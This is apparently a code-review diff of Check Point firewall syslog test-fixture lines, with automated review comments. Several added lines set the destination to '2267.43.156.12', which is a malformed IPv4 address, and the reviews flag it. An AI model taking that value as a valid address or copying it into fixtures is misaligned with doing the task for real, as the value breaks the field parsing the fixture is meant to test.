 <134>1 2020-03-29T20:20:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81032b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:20:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81032b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.196"]
@@ -5050,7 +5050,7 @@
 <134>1 2020-03-29T20:23:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103a8,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51561"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:23:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103a9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:23:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103af,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41728"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T20:23:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103b4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60914"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T20:23:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103b4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60914"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:23:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103bc,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51562"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:23:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103bc,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51563"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:23:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103bf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"10.0.0.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36036"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10456"; xlatesrc:"0.0.0.0"]
@@ -5062,7 +5062,7 @@ <134>1 2020-03-29T20:23:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103de,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"9999"; service:"9999"; src:"192.168.1.1"] <134>1 2020-03-29T20:24:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103e0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51564"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T20:24:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103e0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; 
dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51565"; service:"443"; service_id:"https"; src:"192.168.1.117"] -<134>1 2020-03-29T20:24:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103e7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"] +<134>1 2020-03-29T20:24:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8103e7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"] <134>1 2020-03-29T20:24:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; 
loguid:"{0x5e8103e8,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T20:24:34Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810403,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"] <134>1 2020-03-29T20:24:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810403,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; 
parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] 
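Review bot: The added line in this hunk sets `dst:"2267.43.156.12"`, which is not a valid IPv4 address (the first octet exceeds 255), so an `ip`-typed ECS field such as `destination.ip` will fail type conversion or indexing for this event, and the fixture no longer exercises the inbound udp/5350 path the original `224.0.0.1` line covered. `224.0.0.1` is a link-local multicast address, already non-routable and not identifying anyone, so it needed no scrubbing; if a substitute is still wanted, an RFC 5737 documentation address such as `dst:"192.0.2.12"` keeps the line parseable. The same malformed address appears in later hunks of this file, and the matching expected-output fixture presumably has to change in step.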
@@ -5085,8 +5085,8 @@ <134>1 2020-03-29T20:26:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81047f,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51574"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T20:26:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810482,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51575"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T20:26:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810482,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51576"; service:"443"; service_id:"https"; src:"192.168.1.117"] -<134>1 2020-03-29T20:26:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810484,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"] -<134>1 2020-03-29T20:26:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810484,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"] +<134>1 2020-03-29T20:26:44Z gw-da58d3 CheckPoint 8363 - 
[action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810484,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"] +<134>1 2020-03-29T20:26:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810484,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"] <134>1 2020-03-29T20:26:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810485,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; 
rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57005"; service:"137"; service_id:"nbname"; src:"192.168.1.196"] <134>1 2020-03-29T20:26:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e81048e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46647"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] <134>1 2020-03-29T20:26:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81048f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"] 
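Review bot: Both added lines in this hunk carry `dst:"2267.43.156.12"`, a malformed IPv4 literal (octet 2267 is out of range), so whatever parses or maps `destination.ip` for these two events will reject the value rather than test a realistic destination. The removed lines used `224.0.0.1`, a non-routable multicast address that does not need anonymising; if it must be replaced, a well-formed documentation address such as `dst:"192.0.2.12"` is the safe choice. If the goal of keeping an invalid address is to exercise the error path, that intent should be stated in the PR description, since it changes what these fixture lines assert.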
@@ -5103,7 +5103,7 @@ <134>1 2020-03-29T20:27:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104bb,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"] <134>1 2020-03-29T20:28:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8104d9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"9999"; service:"9999"; src:"192.168.1.1"] <134>1 2020-03-29T20:28:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; 